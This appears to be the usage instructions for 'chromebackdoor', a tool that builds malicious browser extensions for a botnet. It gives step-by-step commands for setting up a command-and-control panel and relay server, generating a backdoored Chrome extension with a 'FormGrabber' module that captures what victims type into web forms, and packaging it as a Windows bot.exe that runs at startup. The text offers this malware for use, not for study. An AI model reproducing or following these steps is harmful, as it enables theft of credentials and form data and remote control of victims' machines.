- unzip file generated by chromebackdoor
unzip folder.zip
Upload a folder web & relais on hosting
create database & user and update config file
- Upload .SQL on database
- Login on webpanel (web/index.php)
username = root
password = toor
#GENERATE BOT (without .EXE)
install all dependency & start chromebackdoor.py
python chromebackdoor.py
You can generate backdoor for all most popular browser
exemple for Google Chrome:
python chromebackdoor.py --chrome
Now enter a botmaster domain name (need SSL):
[?] Website hosted (https://localhost/)? https://lynxframework.com/
Same for relais (need SSL):
[?] Website relais url (https://localhost/relais)? https://lynxrelay.com/relais
or use same domain
[?] Website relais url (https://localhost/relais)? https://lynxframework.com/relais
[?] Information correct [Y/n]? Y
Select one module (exemple FormGrabber V1.0)
[?] please select numbers ? 2
The script generate zip file with .crx .perm and backdoor folder for update icon / name / desc
- run chrommebackdoor with --build
python chromebackdoor.py --build
- select browser backdoor (exemple --chrome)
[?] crx fime (/root/..) ? /root/backdoor.crx
- wine start installer.exe and generate bot.exe
Generate successful : {chromebackdoor_folder}/bot.exe
- Start bot.exe with windows